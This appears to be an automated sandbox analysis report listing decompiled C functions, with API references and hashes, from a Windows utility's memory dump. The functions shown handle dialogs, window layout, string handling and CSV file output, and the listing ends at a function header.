                                                                                                                Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                0x0040588e
                                                                                                                0x0040588f
                                                                                                                0x0040588f
                                                                                                                0x00405892
                                                                                                                0x00405896
                                                                                                                0x004058a9
                                                                                                                0x004058a9
                                                                                                                0x004058ad
                                                                                                                0x004058af
                                                                                                                0x004058b5
                                                                                                                0x004058b6
                                                                                                                0x004058b9
                                                                                                                0x004058c2
                                                                                                                0x004058c3
                                                                                                                0x004058c8
                                                                                                                0x004058d2
                                                                                                                0x004058d4
                                                                                                                0x004058d9
                                                                                                                0x004058e0
                                                                                                                0x004058ea
                                                                                                                0x004058ec
                                                                                                                0x004058ed
                                                                                                                0x004058f2
                                                                                                                0x004058f9
                                                                                                                0x00405902
                                                                                                                0x00405898
                                                                                                                0x00405898
                                                                                                                0x0040589a
                                                                                                                0x0040589c
                                                                                                                0x004058a1
                                                                                                                0x004058a2
                                                                                                                0x004058a5
                                                                                                                0x004058a7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004058a7
                                                                                                                0x00405912
                                                                                                                0x00405915
                                                                                                                0x0040591e
                                                                                                                0x0040591e
                                                                                                                0x00405907
                                                                                                                0x0040590b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                0x0040ad06
                                                                                                                0x0040ad0a
                                                                                                                0x0040ad0c
                                                                                                                0x0040ad14
                                                                                                                0x0040ad19
                                                                                                                0x0040ad1f
                                                                                                                0x0040ad23
                                                                                                                0x0040ad27
                                                                                                                0x0040ad2a
                                                                                                                0x0040ad2d
                                                                                                                0x0040ad34
                                                                                                                0x0040ad3b
                                                                                                                0x0040ad3e
                                                                                                                0x0040ad44
                                                                                                                0x0040ad48
                                                                                                                0x0040ad4a
                                                                                                                0x0040ad52
                                                                                                                0x0040ad5a
                                                                                                                0x0040ad64
                                                                                                                0x0040ad65
                                                                                                                0x0040ad6b
                                                                                                                0x0040ad6c
                                                                                                                0x0040ad73
                                                                                                                0x0040ad76
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7f
                                                                                                                0x0040ad84

                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                0x00404a62
                                                                                                                0x00404a6a
                                                                                                                0x00404a6e
                                                                                                                0x00404a71
                                                                                                                0x00404a74
                                                                                                                0x00404a92
                                                                                                                0x00404a92
                                                                                                                0x00404a76
                                                                                                                0x00404a76
                                                                                                                0x00404a87
                                                                                                                0x00404a90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404a90
                                                                                                                0x00404aa3
                                                                                                                0x00404aa7
                                                                                                                0x00404aa7
                                                                                                                0x00404a94
                                                                                                                0x00404a98

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                0x004072e0
                                                                                                                0x004072f7
                                                                                                                0x004072fd
                                                                                                                0x00407316
                                                                                                                0x00407342

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                0x00408dd0
                                                                                                                0x00408dd2
                                                                                                                0x00408de2
                                                                                                                0x00408df4
                                                                                                                0x00408e01
                                                                                                                0x00408e1b
                                                                                                                0x00408e21
                                                                                                                0x00408e28
                                                                                                                0x00408e30
                                                                                                                0x00408dd4
                                                                                                                0x00408dd8
                                                                                                                0x00408dd8

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                0x004050e1
                                                                                                                0x004050ec
                                                                                                                0x004050ee
                                                                                                                0x004050f5
                                                                                                                0x004050ff
                                                                                                                0x00405114
                                                                                                                0x00405118
                                                                                                                0x00405123
                                                                                                                0x00405128
                                                                                                                0x00405101
                                                                                                                0x00405109
                                                                                                                0x0040510f
                                                                                                                0x0040512e

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                0x00402de0
                                                                                                                0x00402de2
                                                                                                                0x00402dec
                                                                                                                0x00402def
                                                                                                                0x00402dfb
                                                                                                                0x00402e0c
                                                                                                                0x00402e0e
                                                                                                                0x00402e0e
                                                                                                                0x00402e16
                                                                                                                0x00402e18
                                                                                                                0x00402e1a
                                                                                                                0x00402e21

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                0x0040b6a6
                                                                                                                0x0040b6ad
                                                                                                                0x0040b6af
                                                                                                                0x0040b6b0
                                                                                                                0x0040b6b5
                                                                                                                0x0040b6b6
                                                                                                                0x0040b6bd
                                                                                                                0x0040b6bf
                                                                                                                0x0040b6c0
                                                                                                                0x0040b6c5
                                                                                                                0x0040b6c6
                                                                                                                0x0040b6cd
                                                                                                                0x0040b6cf
                                                                                                                0x0040b6d0
                                                                                                                0x0040b6d5
                                                                                                                0x0040b6d6
                                                                                                                0x0040b6dd
                                                                                                                0x0040b6df
                                                                                                                0x0040b6e0
                                                                                                                0x00000000
                                                                                                                0x0040b6e5
                                                                                                                0x0040b6e6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                0x00407362
                                                                                                                0x00407369
                                                                                                                0x0040736e
                                                                                                                0x00407371
                                                                                                                0x00407378
                                                                                                                0x0040737e
                                                                                                                0x00407381
                                                                                                                0x00407386
                                                                                                                0x0040739f
                                                                                                                0x00407388
                                                                                                                0x00407391
                                                                                                                0x00407391
                                                                                                                0x004073a4
                                                                                                                0x004073ac
                                                                                                                0x004073ad
                                                                                                                0x004073cd
                                                                                                                0x004073d0
                                                                                                                0x004073d3
                                                                                                                0x004073d6
                                                                                                                0x004073e0
                                                                                                                0x004073e7
                                                                                                                0x004073ee
                                                                                                                0x004073f5
                                                                                                                0x0040741a
                                                                                                                0x0040741a
                                                                                                                0x0040741d
                                                                                                                0x00407420
                                                                                                                0x00407423
                                                                                                                0x00407426
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004073fc
                                                                                                                0x00407400
                                                                                                                0x0040740f
                                                                                                                0x00407412
                                                                                                                0x00407412
                                                                                                                0x00407402
                                                                                                                0x00407402
                                                                                                                0x00407407
                                                                                                                0x00407407
                                                                                                                0x00407413
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x0040742f
                                                                                                                0x00407434
                                                                                                                0x00407437
                                                                                                                0x00407439
                                                                                                                0x0040743b
                                                                                                                0x0040743b
                                                                                                                0x0040744e
                                                                                                                0x00407453
                                                                                                                0x00407453
                                                                                                                0x004073af
                                                                                                                0x004073b2
                                                                                                                0x004073ba
                                                                                                                0x004073bb
                                                                                                                0x00000000
                                                                                                                0x004073bd
                                                                                                                0x004073c3
                                                                                                                0x004073c3
                                                                                                                0x004073bb
                                                                                                                0x0040745c
                                                                                                                0x00407468
                                                                                                                0x00407468
                                                                                                                0x0040746d
                                                                                                                0x00407473
                                                                                                                0x0040747c
                                                                                                                0x0040748e

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
